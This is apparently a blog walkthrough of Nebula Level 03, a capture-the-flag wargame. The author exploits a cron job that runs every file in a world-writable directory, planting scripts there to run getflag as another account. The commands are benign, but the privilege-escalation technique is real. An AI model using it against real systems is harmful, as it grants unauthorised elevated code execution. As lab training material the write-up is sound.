Nebula Level 03

Level 03 instructions

About
Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.


Alright it wants me to start by checking the flag03 home directory.

ls -al /home/flag03

total 6
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root      80 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh

The file writable.sh looks interesting and has execute permissions.

cat /home/flag03/writable.sh 

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

So this loop runs for every file in /home/flag03/writable.d. It uses ulimit to set a max cput time of 5 seconds then runs bash -x $i, where i is the name of the file. Finally it deletes the file with rm -f $i. So any file that I put into the writable.d directory should get executed each time the script is run.

I test this by creating a simple script in the writable.d directory. If it runs succesfully it should create a new empty file in the /tmp/ directory. Then I run the writable.sh script and see what happens.

echo "touch /tmp/works.tmp" > /home/flag03/writable.d/test.sh
/home/flag03/writable.sh

+ touch /tmp/works.tmp

Now I check my /tmp/ folder to see if the script worked as expected.

ls /tmp/

works.tmp

Great so the script is working as expected. The instructions for this level state that there is a crontab job that runs every few minutes so I create a create a new script to execute getflag and see if cron runs it as the flag03 account.

echo 'getflag > /tmp/gotflag.txt' >/home/flag03/writable.d/gettheflag.sh
cat /tmp/gotflag.txt

You have successfully executed getflag on a target account

Leave a Reply

Your email address will not be published. Required fields are marked *